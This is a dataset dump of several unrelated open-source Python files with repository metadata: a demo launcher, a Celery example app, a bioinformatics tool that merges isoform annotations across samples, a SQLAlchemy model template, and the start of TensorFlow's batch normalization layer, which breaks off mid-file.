|
2021-03-18T00:56:04.000Z
|
launcher/SrcDemo2-debug.py
|
TiagoFilippi/srcdemo2
|
53bf581bc6fd8efc7b8f9c22b9278a682fdf5365
|
[
"BSD-2-Clause"
] | 3
|
2015-04-21T23:23:44.000Z
|
2017-03-19T16:49:39.000Z
|
launcher/SrcDemo2-debug.py
|
TiagoFilippi/srcdemo2
|
53bf581bc6fd8efc7b8f9c22b9278a682fdf5365
|
[
"BSD-2-Clause"
] | 8
|
2015-07-13T13:37:52.000Z
|
2020-09-18T01:16:48.000Z
|
import traceback
try:
import SrcDemo2Launcher
SrcDemo2Launcher.launch(True)
except:
traceback.print_exc()
try:
from SrcDemo2Launcher import is_windows
if is_windows():
raw_input('Press Enter to close this window...')
except:
raw_input('Press Enter to continue.')
| 18.2
| 50
| 0.776557
|
4a0f2077a96067016076159817dd5e8a7d7cd598
| 817
|
py
|
Python
|
desktop/core/ext-py/celery-4.2.1/examples/app/myapp.py
|
maulikjs/hue
|
59ac879b55bb6fb26ecb4e85f4c70836fc21173f
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/celery-4.2.1/examples/app/myapp.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/celery-4.2.1/examples/app/myapp.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
"""myapp.py
Usage::
(window1)$ python myapp.py worker -l info
(window2)$ python
>>> from myapp import add
>>> add.delay(16, 16).get()
32
You can also specify the app to use with the `celery` command,
using the `-A` / `--app` option::
$ celery -A myapp worker -l info
With the `-A myproj` argument the program will search for an app
instance in the module ``myproj``. You can also specify an explicit
name using the fully qualified form::
$ celery -A myapp:app worker -l info
"""
from __future__ import absolute_import, unicode_literals
from celery import Celery
app = Celery(
'myapp',
broker='amqp://guest@localhost//',
# ## add result backend here if needed.
# backend='rpc'
)
@app.task
def add(x, y):
return x + y
if __name__ == '__main__':
app.start()
| 19
| 68
| 0.656059
|
4a0f2077db7d23cf2ee18132f53da6530d07623a
| 23,927
|
py
|
Python
|
cupcake/tofu/counting/combine_abundance_across_samples.py
|
ArthurDondi/cDNA_Cupcake
|
528b9593b0ad166ac720be7c5c07a968730a2ce2
|
[
"BSD-3-Clause-Clear"
] | 205
|
2016-07-13T06:26:20.000Z
|
2022-03-03T06:29:43.000Z
|
cupcake/tofu/counting/combine_abundance_across_samples.py
|
ArthurDondi/cDNA_Cupcake
|
528b9593b0ad166ac720be7c5c07a968730a2ce2
|
[
"BSD-3-Clause-Clear"
] | 186
|
2017-02-22T22:46:46.000Z
|
2022-03-23T16:16:15.000Z
|
cupcake/tofu/counting/combine_abundance_across_samples.py
|
ArthurDondi/cDNA_Cupcake
|
528b9593b0ad166ac720be7c5c07a968730a2ce2
|
[
"BSD-3-Clause-Clear"
] | 93
|
2016-08-31T02:24:52.000Z
|
2022-02-24T14:01:27.000Z
|
__author__ = 'etseng@pacb.com'
import os, sys, re, time
import pdb
from csv import DictWriter
from Bio import SeqIO
from collections import defaultdict, namedtuple
from cupcake.tofu import compare_junctions
from cupcake.io import GFF
from bx.intervals import IntervalTree
from bx.intervals.cluster import ClusterTree
seqid_rex = re.compile('(\S+\\.\d+)\\.(\d+)')
MatchRecord = namedtuple('MatchRecord', ['ref_id', 'addon_id', 'rec', 'members', 'seqrec'])
def find_representative_in_iso_list(records):
"""
:param records: list of GMAPRecord
:return: representative record that is (a) the most number of exons or then (b) longest
"""
rep = records[0]
for r in records[1:]:
if len(rep.ref_exons) < len(r.ref_exons) or (rep.end-rep.start) < (r.end-r.start):
rep = r
return rep
def sanity_check_seqids(seqids):
for seqid in seqids:
m = seqid_rex.match(seqid)
if m is None:
print("Expected ID format (ex: PB.1.2) not followed by {0}! Abort!".format(seqid), file=sys.stderr)
sys.exit(-1)
def get_fusion_id(seqid):
m = seqid_rex.match(seqid)
return m.group(1)
def write_reclist_to_gff_n_info(rec_list, final_prefix, ref_name, addon_name, use_fq=False):
# now go through the rec list and figure out in what order we are outputting the total records
tree = defaultdict(lambda: {'+':ClusterTree(0,0), '-':ClusterTree(0,0)})
tree_keys_numeric = set()
tree_keys_alpha = set()
for i,match_rec in enumerate(rec_list):
tree[match_rec.rec.chr][match_rec.rec.strand].insert(match_rec.rec.start, match_rec.rec.end, i)
for chrom in tree:
try:
k = int(chrom)
tree_keys_numeric.add(k)
except ValueError:
tree_keys_alpha.add(chrom)
tree_keys = sorted(list(tree_keys_numeric)) + sorted(list(tree_keys_alpha))
f_gff = open(final_prefix+'.gff', 'w')
f_info = open(final_prefix+'.mega_info.txt', 'w')
writer_info = DictWriter(f_info, fieldnames=['superPBID', ref_name, addon_name], delimiter='\t')
writer_info.writeheader()
f_group = open(final_prefix+'.group.txt', 'w')
if use_fq:
f_fq = open(final_prefix+'.rep.fq', 'w')
# sort the combined gff (tree) by chromosome and strand (- first)
new_group_info = {}
pb_i = 0
for _chr in tree_keys:
# remember to convert potential integer chromsomes keys back to string now that we sorted them!
_chr = str(_chr)
for _strand in ('+', '-'):
for _start,_end,_indices in tree[_chr][_strand].getregions():
# further sort these records by (start, end, num_exons)
_indices.sort(key=lambda i: (rec_list[i].rec.start, rec_list[i].rec.end, len(rec_list[i].rec.ref_exons)))
pb_i += 1
for pb_j, recs_index in enumerate(_indices):
pbgene = "PB.{0}".format(pb_i)
pbid = "PB.{0}.{1}".format(pb_i, pb_j + 1)
match_rec = rec_list[recs_index]
new_group_info[pbid] = match_rec.members
match_rec.rec.seqid = pbid
match_rec.rec.geneid = pbgene
GFF.write_collapseGFF_format(f_gff, match_rec.rec)
writer_info.writerow({'superPBID': pbid, ref_name: match_rec.ref_id, addon_name: match_rec.addon_id})
f_group.write("{0}\t{1}\n".format(pbid, ",".join(match_rec.members)))
if use_fq:
match_rec.seqrec.id = pbid
match_rec.seqrec.description = ''
SeqIO.write(match_rec.seqrec, f_fq, 'fastq')
f_gff.close()
f_info.close()
f_group.close()
if use_fq:
f_fq.close()
return new_group_info
class MegaPBTree(object):
"""
Structure for maintaining a non-redundant set of gene annotations
Used to combine with different collapsed GFFs from different samples
"""
def __init__(self, gff_filename, group_filename, internal_fuzzy_max_dist=0, self_prefix=None, allow_5merge=False, fastq_filename=None, max_3_diff=None):
self.gff_filename = gff_filename
self.group_filename = group_filename
self.self_prefix = self_prefix
self.internal_fuzzy_max_dist = internal_fuzzy_max_dist
self.max_3_diff = max_3_diff
self.allow_5merge = allow_5merge
self.record_d = dict((r.seqid, r) for r in GFF.collapseGFFReader(gff_filename))
#sanity_check_seqids(self.record_d.keys()) # sanity check all IDs look like PB.1.2
self.tree = defaultdict(lambda: {'+':IntervalTree(), '-':IntervalTree()}) # chr --> strand --> tree
self.fastq_dict = None
if fastq_filename is not None:
self.fastq_dict = MegaPBTree.read_fastq_to_dict(fastq_filename)
#print >> sys.stderr, "self.internal_fuzzy_max_dist is", internal_fuzzy_max_dist
#raw_input()
self.read_gff_as_interval_tree()
self.group_info = MegaPBTree.read_group(self.group_filename, self.self_prefix) # ex: PB.1.1 --> [ RatHeart|i3_c123.... ]
def read_gff_as_interval_tree(self):
"""
Read a collapsed GFF file into an IntervalTree
"""
for r in GFF.collapseGFFReader(self.gff_filename):
self.tree[r.chr][r.strand].insert(r.start, r.end, r)
@staticmethod
def read_fastq_to_dict(fastq_filename):
fastq_dict = {}
for r in SeqIO.parse(open(fastq_filename), 'fastq'):
fastq_dict[r.id.split('|')[0]] = r
return fastq_dict
@staticmethod
def read_group(group_filename, group_prefix):
group_info = {}
with open(group_filename) as f:
for line in f:
pbid, members = line.strip().split('\t')
if group_prefix is None:
group_info[pbid] = [x for x in members.split(',')]
else:
group_info[pbid] = [group_prefix+'|'+x for x in members.split(',')]
return group_info
def match_record_to_tree(self, r):
"""
r --- GMAPRecord
tree --- dict of chromosome --> strand --> IntervalTree
If exact match (every exon junction) or 5' truncated (allow_5merge is True), YIELD the matching GMAPRecord(s)
*NOTE/UPDATE*: could have multiple matches! )
"""
#if r.chr=='chr17' and r.start > 39604000:
# pdb.set_trace()
matches = self.tree[r.chr][r.strand].find(r.start, r.end)
for r2 in matches:
r.segments = r.ref_exons
r2.segments = r2.ref_exons
n1 = len(r.segments)
n2 = len(r2.segments)
three_end_is_match = self.max_3_diff is None or \
(r.strand=='+' and abs(r.end-r2.end)<=self.max_3_diff) or \
(r.strand=='-' and abs(r.start-r2.start)<=self.max_3_diff)
last_junction_match = False
if n1 == 1:
if n2 == 1: last_junction_match = True
else: last_junction_match = False
else:
if n2 == 1: last_junction_match = False
else:
if r.strand == '+':
last_junction_match = (abs(r.segments[-1].start-r2.segments[-1].start) <= self.internal_fuzzy_max_dist) and \
(abs(r.segments[0].end-r2.segments[0].end) <= self.internal_fuzzy_max_dist)
else:
last_junction_match = (abs(r.segments[0].end-r2.segments[0].end) <= self.internal_fuzzy_max_dist) and \
(abs(r.segments[1].start-r2.segments[1].start) <= self.internal_fuzzy_max_dist)
if compare_junctions.compare_junctions(r, r2, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist) == 'exact': # is a match!
if three_end_is_match:
yield r2
elif self.allow_5merge: # check if the shorter one is a subset of the longer one
if len(r.segments) > len(r2.segments):
a, b = r, r2
else:
a, b = r2, r
# a is the longer one, b is the shorter one
if compare_junctions.compare_junctions(b, a, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist) == 'subset':
# we only know that a is a subset of b, verify that it is actually 5' truncated (strand-sensitive!)
# if + strand, last junction of (a,b) should match and 3' end not too diff
# if - strand, first exon of a should match first exon of b AND the next exon don't overlap
if three_end_is_match and last_junction_match:
yield r2
def add_sample(self, gff_filename, group_filename, sample_prefix, output_prefix, fastq_filename=None):
combined = [] # list of (<matches to r2 or None>, r2)
unmatched_recs = set(self.record_d.keys())
for r in GFF.collapseGFFReader(gff_filename):
match_rec_list = [x for x in self.match_record_to_tree(r)]
if len(match_rec_list) > 0: # found match(es)! put longer of r1/r2 in
#if len(match_rec_list) > 1: pdb.set_trace() #DEBUG
combined.append((match_rec_list, r))
for match_rec in match_rec_list:
try:
unmatched_recs.remove(match_rec.seqid)
except KeyError:
pass # already deleted, OK, this can happen
else: # r is not present in current tree
combined.append((None, r))
# put whatever is left from the tree in
for seqid in unmatched_recs:
combined.append(([self.record_d[seqid]], None))
# create a ClusterTree to re-calc the loci/transcripts
final_tree = defaultdict(lambda: {'+': ClusterTree(0, 0), '-':ClusterTree(0, 0)})
for i,(r1s,r2) in enumerate(combined):
if r1s is None:
final_tree[r2.chr][r2.strand].insert(r2.start, r2.end, i)
else:
if r2 is not None:
rep = find_representative_in_iso_list(r1s + [r2])
else:
rep = find_representative_in_iso_list(r1s)
final_tree[rep.chr][rep.strand].insert(rep.start, rep.end, i)
self.write_cluster_tree_as_gff(final_tree, combined, group_filename, sample_prefix, output_prefix, fastq_filename2=fastq_filename)
def write_cluster_tree_as_gff(self, cluster_tree, rec_list, group_filename2, sample_prefix2, output_prefix, fastq_filename2=None):
"""
Write ClusterTree (chr --> dict --> (start, end, rec_list_index)) as collapsedGFF format
Returns --- a new group_info!!!
"""
use_fq = fastq_filename2 is not None and self.fastq_dict is not None
if use_fq:
fastq_dict2 = MegaPBTree.read_fastq_to_dict(fastq_filename2)
group_info2 = MegaPBTree.read_group(group_filename2, sample_prefix2)
# currently: rec_list is (r1s, r2) where r1s, r2 are records and could be None
# make rec_list into list of MatchRec (ref_id, addon_id, representative rec, seqrec, group_info members)
new_rec_list = []
for r1s, r2 in rec_list:
if r2 is None:
for r1 in r1s:
new_rec_list.append(MatchRecord(ref_id=r1.seqid, addon_id="NA", rec=r1, members=self.group_info[r1.seqid],
seqrec=self.fastq_dict[r1.seqid] if use_fq else None))
elif r1s is None:
new_rec_list.append(MatchRecord(ref_id="NA", addon_id=r2.seqid, rec=r2, members=group_info2[r2.seqid],
seqrec=fastq_dict2[r2.seqid] if use_fq else None))
else:
for r1 in r1s:
if len(r1s)>1: print("matching {0} to {1}".format(r1, r2), file=sys.stderr)
rep = find_representative_in_iso_list([r1, r2])
new_rec_list.append(MatchRecord(ref_id=r1.seqid,
addon_id=r2.seqid,
rec=rep,
members=self.group_info[r1.seqid]+group_info2[r2.seqid],
seqrec=self.fastq_dict[rep.seqid] if use_fq else None))
#rep = find_representative_in_iso_list(r1s + [r2])
#all_members = group_info2[r2.seqid]
#for r1 in r1s: all_members += self.group_info[r1.seqid]
#new_rec_list.append(MatchRecord(ref_id=",".join(r1.seqid for r1 in r1s),
# addon_id=r2.seqid,
# rec=rep,
# members=all_members,
# seqrec=self.fastq_dict[rep.seqid] if use_fq else None))
#pdb.set_trace()
new_group_info = write_reclist_to_gff_n_info(new_rec_list, output_prefix, self.self_prefix, sample_prefix2, use_fq)
return new_group_info
class MegaPBTreeFusion(MegaPBTree):
def __init__(self, gff_filename, group_filename, internal_fuzzy_max_dist=0, self_prefix=None, fastq_filename=None, fusion_max_dist=10):
"""
Differences with non-fusion MegaPBTree:
1. allow_5merge is always FALSE. Not a parameter.
2. fusion_max_dist --- maximum allowed distance on internal fusion sites to be called as equivalent fusions
"""
super(MegaPBTreeFusion, self).__init__(gff_filename, group_filename, internal_fuzzy_max_dist, self_prefix, False, fastq_filename)
self.fusion_max_dist = fusion_max_dist
# ex: PBfusion.1 -> [PBfusion.1.1, PBfusion.1.2]
self.record_d_fusion = dict((fusion_id, records) for fusion_id,records in GFF.collapseGFFFusionReader(gff_filename))
def junction_match_check_5(self, r1, r2):
if r1.strand == '+':
return abs(r1.ref_exons[0].start-r2.ref_exons[0].start) <= self.fusion_max_dist
else:
return abs(r1.ref_exons[-1].end-r2.ref_exons[-1].end) <= self.fusion_max_dist
def junction_match_check_3(self, r1, r2):
if r1.strand == '+':
return abs(r1.ref_exons[-1].end-r2.ref_exons[-1].end) <= self.fusion_max_dist
else:
return abs(r1.ref_exons[0].start-r2.ref_exons[0].start) <= self.fusion_max_dist
def match_record_to_tree(self, r, check_5_dist, check_3_dist):
"""
Matching a single record (locus).
Major diff from non-fusion version:
1. there could be multiple matches!
2. no 5merge allowed
3. additionally checks if the 5'/3' ends don't disagree too much (fusion_max_dist). this is used for fusion junctions.
4. need to take care that fusions can be multi-chromosome! write output correctly!!!
"""
matches = self.tree[r.chr][r.strand].find(r.start, r.end)
result = []
for r2 in matches:
r.segments = r.ref_exons
r2.segments = r2.ref_exons
if compare_junctions.compare_junctions(r, r2, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist) == 'exact' and \
(not check_5_dist or self.junction_match_check_5(r, r2)) and \
(not check_3_dist or self.junction_match_check_3(r, r2)): # is a match!
result.append(r2.seqid)
return result
def check_records_match(self, records1, records2):
"""
records1, records2 are two fusion records.
They match iff:
1. same number of records
2. each record (a loci) matches
"""
if len(records1)!=len(records2): return False
i = 0
for r1, r2 in zip(records1, records2):
# check: chr, strand, exons match
if r1.chr!=r2.chr or r1.strand!=r2.strand: return False
r1.segments = r1.ref_exons
r2.segments = r2.ref_exons
if compare_junctions.compare_junctions(r1, r2, internal_fuzzy_max_dist=self.internal_fuzzy_max_dist)!='exact':
return False
if i == 0: # first record, only need 3' to agree
if not self.junction_match_check_3(r1, r2): return False
elif i == len(records1)-1: #last record, only need 5' to agree
if not self.junction_match_check_5(r1, r2): return False
else:
if not self.junction_match_check_5(r1, r2): return False
if not self.junction_match_check_3(r1, r2): return False
i += 1
return True
def match_fusion_record(self, records):
"""
records --- in order, the records of a single fusion.
"""
good = []
# match the first record, requiring additionally that the precise 3' end matches
cands = self.match_record_to_tree(records[0], check_5_dist=False, check_3_dist=True)
# for each candidate (ex: PB.8.1, extract the full set of records and match them)
for cand in cands:
m = seqid_rex.match(cand)
fusion_id = m.group(1)
if self.check_records_match(records, self.record_d_fusion[fusion_id]):
good.append(fusion_id)
if len(good) == 0:
return None
elif len(good) == 1:
return good[0]
else:
print("ERROR! more than one possible candidate in match_fusion_record! DEBUG.", file=sys.stderr)
print("MATCHED:", good, file=sys.stderr)
sys.exit(-1)
def add_sample(self, gff_filename, group_filename, sample_prefix, output_prefix, fastq_filename=None):
combined = [] # list of (r1 if r2 is None | r2 if r1 is None | longer of r1 or r2 if both not None)
unmatched_recs = list(self.record_d_fusion.keys())
for _id, records in GFF.collapseGFFFusionReader(gff_filename):
match_seqid = self.match_fusion_record(records)
if match_seqid is not None:
combined.append((self.record_d_fusion[match_seqid], records))
try:
unmatched_recs.remove(match_seqid)
except ValueError:
pass # already deleted, OK, this happens for single-exon transcripts
else: # r is not present in current tree
combined.append((None, records))
# put whatever is left from the tree in
for seqid in unmatched_recs:
combined.append((self.record_d_fusion[seqid], None))
# create a ClusterTree to re-calc the loci/transcripts
final_tree = defaultdict(lambda: {'+': ClusterTree(0, 0), '-':ClusterTree(0, 0)})
for i,(r1s,r2s) in enumerate(combined):
if r2s is None or (r1s is not None and r1s[0].end-r1s[0].start > r2s[0].end-r2s[0].start):
final_tree[r1s[0].chr][r1s[0].strand].insert(r1s[0].start, r1s[0].end, i)
else:
final_tree[r2s[0].chr][r2s[0].strand].insert(r2s[0].start, r2s[0].end, i)
self.write_cluster_tree_as_gff(final_tree, combined, group_filename, sample_prefix, output_prefix, fastq_filename2=fastq_filename)
def write_cluster_tree_as_gff(self, cluster_tree, rec_list, group_filename2, sample_prefix2, output_prefix, fastq_filename2=None):
"""
Write ClusterTree (chr --> dict --> (start, end, rec_list_index)) as collapsedGFF format
Returns --- a new group_info!!!
"""
if fastq_filename2 is not None:
fastq_dict2 = MegaPBTree.read_fastq_to_dict(fastq_filename2)
f_fastq = open(output_prefix+'.rep.fq', 'w')
group_info2 = MegaPBTree.read_group(group_filename2, sample_prefix2)
new_group_info = {}
f_out = open(output_prefix+'.gff', 'w')
f_group = open(output_prefix+'.group.txt', 'w')
f_mgroup = open(output_prefix + '.mega_info.txt', 'w')
f_mgroup.write("pbid\t{0}\t{1}\n".format(self.self_prefix, sample_prefix2))
fusion_index = 0
chroms = list(cluster_tree.keys())
chroms.sort()
for k in chroms: # IMPORTANT: for fusion, this is *just* the chrom of the first record! Fusions can be multi-chrom
for strand in ('+', '-'):
for _s, _e, rec_indices in cluster_tree[k][strand].getregions():
for i in rec_indices:
fusion_index += 1
tID = "PBfusion.{i}".format(i=fusion_index)
r1s, r2s = rec_list[i]
if r1s is None: # r2s is not None
recs = r2s
r2_fusion_id = get_fusion_id(r2s[0].seqid)
new_group_info[tID] = group_info2[r2_fusion_id]
f_mgroup.write("{tID}\tNA\t{group}\n".format(tID=tID, group=r2_fusion_id))
if fastq_filename2 is not None:
seqrec = fastq_dict2[r2_fusion_id]
elif r2s is None: # r1 is not None
recs = r1s
r1_fusion_id = get_fusion_id(r1s[0].seqid)
new_group_info[tID] = self.group_info[r1_fusion_id]
f_mgroup.write("{tID}\t{group}\tNA\n".format(tID=tID, group=r1_fusion_id))
if fastq_filename2 is not None:
seqrec = self.fastq_dict[r1_fusion_id]
else: # both r1, r2 are not empty
r1_fusion_id = get_fusion_id(r1s[0].seqid)
r2_fusion_id = get_fusion_id(r2s[0].seqid)
r1_len = sum(x.end-x.start for x in r1s)
r2_len = sum(x.end-x.start for x in r2s)
if r1_len > r2_len:
recs = r1s
if fastq_filename2 is not None:
seqrec = self.fastq_dict[r1_fusion_id]
else:
recs = r2s
if fastq_filename2 is not None:
seqrec = fastq_dict2[r2_fusion_id]
new_group_info[tID] = self.group_info[r1_fusion_id] + group_info2[r2_fusion_id]
f_mgroup.write("{tID}\t{group1}\t{group2}\n".format(tID=tID, group1=r1_fusion_id, group2=r2_fusion_id))
if fastq_filename2 is not None:
seqrec.id = tID
SeqIO.write(seqrec, f_fastq, 'fastq')
f_group.write("{tID}\t{members}\n".format(tID=tID, members=",".join(new_group_info[tID])))
# now write out the fusion transcript
for j,r in enumerate(recs):
f_out.write("{chr}\tPacBio\ttranscript\t{s}\t{e}\t.\t{strand}\t.\tgene_id \"{gid}\"; transcript_id \"{gid}.{j}\";\n".format(\
chr=r.chr, s=r.start+1, e=r.end, strand=strand, gid=tID, j=j+1))
for exon in r.ref_exons:
f_out.write("{chr}\tPacBio\texon\t{s}\t{e}\t.\t{strand}\t.\tgene_id \"{gid}\"; transcript_id \"{gid}.{j}\";\n".format(\
chr=r.chr, s=exon.start+1, e=exon.end, strand=strand, gid=tID, j=j+1))
f_out.close()
f_group.close()
f_mgroup.close()
if fastq_filename2 is not None:
f_fastq.close()
return new_group_info
| 49.641079
| 156
| 0.579178
|
4a0f2142226ee708fafc387fae09ebd34ce5f505
| 1,133
|
py
|
Python
|
{{cookiecutter.project_name}}/template_minimal/app/models.py
|
rafsaf/respo-fastapi-template
|
1225637fe9301b76670fa84ebe96263e7e7676a7
|
[
"MIT"
] | 75
|
2021-11-11T14:38:22.000Z
|
2022-03-31T14:25:40.000Z
|
{{cookiecutter.project_name}}/template_minimal/app/models.py
|
rafsaf/respo-fastapi-template
|
1225637fe9301b76670fa84ebe96263e7e7676a7
|
[
"MIT"
] | 2
|
2021-11-24T16:45:42.000Z
|
2022-01-30T14:20:38.000Z
|
{{cookiecutter.project_name}}/template_minimal/app/models.py
|
rafsaf/respo-fastapi-template
|
1225637fe9301b76670fa84ebe96263e7e7676a7
|
[
"MIT"
] | 9
|
2021-11-11T14:38:27.000Z
|
2022-03-04T01:47:38.000Z
|
"""
SQL Alchemy models declaration.
https://docs.sqlalchemy.org/en/14/orm/declarative_styles.html#example-two-dataclasses-with-declarative-table
Dataclass style for powerful autocompletion support.
https://alembic.sqlalchemy.org/en/latest/tutorial.html
Note, it is used by alembic migrations logic, see `alembic/env.py`
Alembic shortcuts:
# create migration
alembic revision --autogenerate -m "migration_name"
# apply all migrations
alembic upgrade head
"""
import uuid
from dataclasses import dataclass, field
from sqlalchemy import Column, String
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import registry
Base = registry()
@Base.mapped
@dataclass
class User:
__tablename__ = "user_model"
__sa_dataclass_metadata_key__ = "sa"
id: uuid.UUID = field(
init=False,
default_factory=uuid.uuid4,
metadata={"sa": Column(UUID(as_uuid=True), primary_key=True)},
)
email: str = field(
metadata={"sa": Column(String(254), nullable=False, unique=True, index=True)}
)
hashed_password: str = field(metadata={"sa": Column(String(128), nullable=False)})
| 26.97619
| 108
| 0.740512
|
4a0f21e2840fc629fc51548b07c467137a56018e
| 28,349
|
py
|
Python
|
tensorflow/python/layers/normalization.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-08T04:32:21.000Z
|
2017-09-08T04:32:21.000Z
|
tensorflow/python/layers/normalization.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/layers/normalization.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-12T19:41:26.000Z
|
2017-09-12T19:41:26.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# pylint: disable=unused-import,g-bad-import-order
"""Contains the normalization layer classes and their functional aliases.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import moving_averages
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
'').lower() in ('true', 't', '1')
class BatchNormalization(base.Layer):
"""Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Arguments:
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Conv2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: An optional projection function to be applied to the `beta`
weight after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
gamma_constraint: An optional projection function to be applied to the
`gamma` weight after being updated by an `Optimizer`.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_momentum: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `momentum` is still applied
to get the means and variances for inference.
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: A string, the name of the layer.
"""
def __init__(self,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
renorm=False,
renorm_clipping=None,
renorm_momentum=0.99,
fused=None,
trainable=True,
name=None,
**kwargs):
super(BatchNormalization, self).__init__(
name=name, trainable=trainable, **kwargs)
self.axis = axis
self.momentum = momentum
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = beta_initializer
self.gamma_initializer = gamma_initializer
self.moving_mean_initializer = moving_mean_initializer
self.moving_variance_initializer = moving_variance_initializer
self.beta_regularizer = beta_regularizer
self.gamma_regularizer = gamma_regularizer
self.beta_constraint = beta_constraint
self.gamma_constraint = gamma_constraint
self.renorm = renorm
# This environment variable is only used during the testing period of fused
# batch norm and will be removed after that.
if fused is None:
fused = _FUSED_DEFAULT
self.fused = fused
self._bessels_correction_test_only = True
if renorm:
renorm_clipping = renorm_clipping or {}
keys = ['rmax', 'rmin', 'dmax']
if set(renorm_clipping) - set(keys):
raise ValueError('renorm_clipping %s contains keys not in %s' %
(renorm_clipping, keys))
self.renorm_clipping = renorm_clipping
self.renorm_momentum = renorm_momentum
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if not input_shape.ndims:
raise ValueError('Input has undefined rank:', input_shape)
ndim = len(input_shape)
if self.axis < 0:
axis = ndim + self.axis
else:
axis = self.axis
if axis < 0 or axis >= ndim:
raise ValueError('Value of `axis` argument ' + str(self.axis) +
' is out of range for input with rank ' + str(ndim))
if self.fused:
# Currently fused batch norm doesn't support renorm and beta/gamma
# regularizer; and only supports an input tensor of rank 4 and a channel
# dimension on axis 1 and 3.
# TODO(yaozhang): if input is not 4D, reshape it to 4D and reshape the
# output back to its original shape accordingly.
self.fused = not self.renorm and ndim == 4 and axis in [
1, 3
] and self.beta_regularizer is None and self.gamma_regularizer is None
if self.fused:
if axis == 1:
self._data_format = 'NCHW'
else:
self._data_format = 'NHWC'
param_dim = input_shape[axis]
if not param_dim.value:
raise ValueError('Input has undefined `axis` dimension. Input shape: ',
input_shape)
self.input_spec = base.InputSpec(ndim=ndim,
axes={self.axis: param_dim.value})
if self.scale:
self.gamma = self.add_variable(name='gamma',
shape=(param_dim,),
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
trainable=True)
else:
self.gamma = None
if self.fused:
self._gamma_const = array_ops.constant(1.0, shape=(param_dim,))
if self.center:
self.beta = self.add_variable(name='beta',
shape=(param_dim,),
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
trainable=True)
else:
self.beta = None
if self.fused:
self._beta_const = array_ops.constant(0.0, shape=(param_dim,))
# Disable variable partitioning when creating the moving mean and variance
try:
if self._scope:
partitioner = self._scope.partitioner
self._scope.set_partitioner(None)
else:
partitioner = None
self.moving_mean = self.add_variable(
name='moving_mean',
